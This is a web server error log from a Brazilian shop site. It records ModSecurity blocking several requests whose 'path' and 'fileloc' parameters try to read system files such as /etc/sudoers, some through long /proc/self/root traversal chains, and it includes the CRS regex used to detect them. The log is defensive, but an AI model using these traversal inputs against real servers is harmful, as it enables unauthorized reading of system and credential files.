[Fri Mar 20 10:50:13.414327 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.1:39116] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QlfqxLDW4GITHUkQNswAAARU"]
[Fri Mar 20 10:50:18.239172 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.62:39286] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Qmta6ubjKNq_cu4b-CAAAA1Q"]
[Fri Mar 20 10:50:24.421951 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:56502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1QoDJ3M9BSuKP7CAZIyAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Fri Mar 20 10:50:26.387832 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.101:39626] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1QovqxLDW4GITHUkQNvgAAAQo"]
[Fri Mar 20 10:50:37.647286 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.244.43:40890] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1QrfXLqtnMIWvjpaK_tgAAApY"]
[Fri Mar 20 10:50:40.742982 2026] [:error] [pid 31215:tid 140411691570944] [client 57.141.18.74:40270] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1QrwF0L0L-SsrnPo6M_wAAAsY"]
[Fri Mar 20 10:50:40.758675 2026] [:error] [pid 11167:tid 140411632822016] [client 216.73.216.191:40276] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1Qr_HIg5MgXLBnicMaIAAAAc0"]
[Fri Mar 20 10:50:42.336939 2026] [:error] [pid 10189:tid 140411641214720] [client 57.141.18.78:40288] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QrzJ3M9BSuKP7CAZI6QAAAIw"]
[Fri Mar 20 10:50:42.694883 2026] [:error] [pid 11167:tid 140411649607424] [client 216.73.216.191:40444] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1QsvHIg5MgXLBnicMaJgAAAcs"]
[Fri Mar 20 10:50:43.055458 2026] [:error] [pid 7235:tid 140411691570944] [client 216.73.216.191:40478] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Qs_qxLDW4GITHUkQNyQAAAQY"]
[Fri Mar 20 10:50:43.369788 2026] [mime_magic:error] [pid 31215:tid 140411666392832] (70014)End of file found: [client 57.141.18.77:40496] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:50:43.373794 2026] [mime_magic:error] [pid 31215:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:40494] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:50:44.169981 2026] [:error] [pid 11167:tid 140411590858496] [client 57.141.18.4:40542] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QtPHIg5MgXLBnicMaKwAAAdI"]
[Fri Mar 20 10:50:48.418755 2026] [:error] [pid 9818:tid 140411624429312] [client 57.141.18.53:40802] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1QuF1pVZ5mVmJwsFNTqgAAAE4"]
[Fri Mar 20 10:50:51.154934 2026] [:error] [pid 26799:tid 140411683178240] [client 216.73.216.191:41004] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Qu9a6ubjKNq_cu4b-KAAAA0c"]
[Fri Mar 20 10:50:52.988345 2026] [:error] [pid 11167:tid 140411658000128] [client 216.73.216.191:41048] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1Qu_HIg5MgXLBnicMaNwAAAco"]
[Fri Mar 20 10:51:06.519565 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.94:41658] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1Qyl1pVZ5mVmJwsFNTuQAAAE8"]
[Fri Mar 20 10:51:08.309802 2026] [mime_magic:error] [pid 7893:tid 140411616036608] (70014)End of file found: [client 57.141.18.22:41680] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:51:12.399708 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:44264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Q0DJ3M9BSuKP7CAZJHAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:51:15.263140 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.243.128:45240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Q011pVZ5mVmJwsFNTvwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:51:21.096915 2026] [mime_magic:error] [pid 11642:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:42250] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:51:21.216612 2026] [:error] [pid 31215:tid 140411557287680] [client 57.141.18.114:42262] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Q2QF0L0L-SsrnPo6NJQAAAtY"]
[Fri Mar 20 10:51:21.503320 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.104:42108] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Q2fXLqtnMIWvjpaK_3QAAAog"]
[Fri Mar 20 10:51:24.876431 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.109:42344] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Q3Na6ubjKNq_cu4b-VwAAA08"]
[Fri Mar 20 10:51:25.557773 2026] [mime_magic:error] [pid 10189:tid 140411699963648] (70014)End of file found: [client 57.141.18.117:42422] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:51:30.351048 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:45250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Q4rninkcc-iUj5AqB-QAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:51:32.636238 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.66:42670] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Q5OoXxyEfFpUF8f-kvgAAAVQ"]
[Fri Mar 20 10:51:33.287700 2026] [:error] [pid 11167:tid 140411708356352] [client 57.141.18.116:42916] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Q5fHIg5MgXLBnicMaXQAAAcQ"]
[Fri Mar 20 10:51:56.154644 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.67:43984] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Q_BCii7xarUs8iHaPDQAAAgo"]
[Fri Mar 20 10:51:58.690974 2026] [:error] [pid 10189:tid 140411699963648] [client 57.141.18.64:44058] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Q_jJ3M9BSuKP7CAZJWQAAAIU"]
[Fri Mar 20 10:52:26.098681 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.4:45266] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab1RGuoXxyEfFpUF8f-k3QAAAVc"]
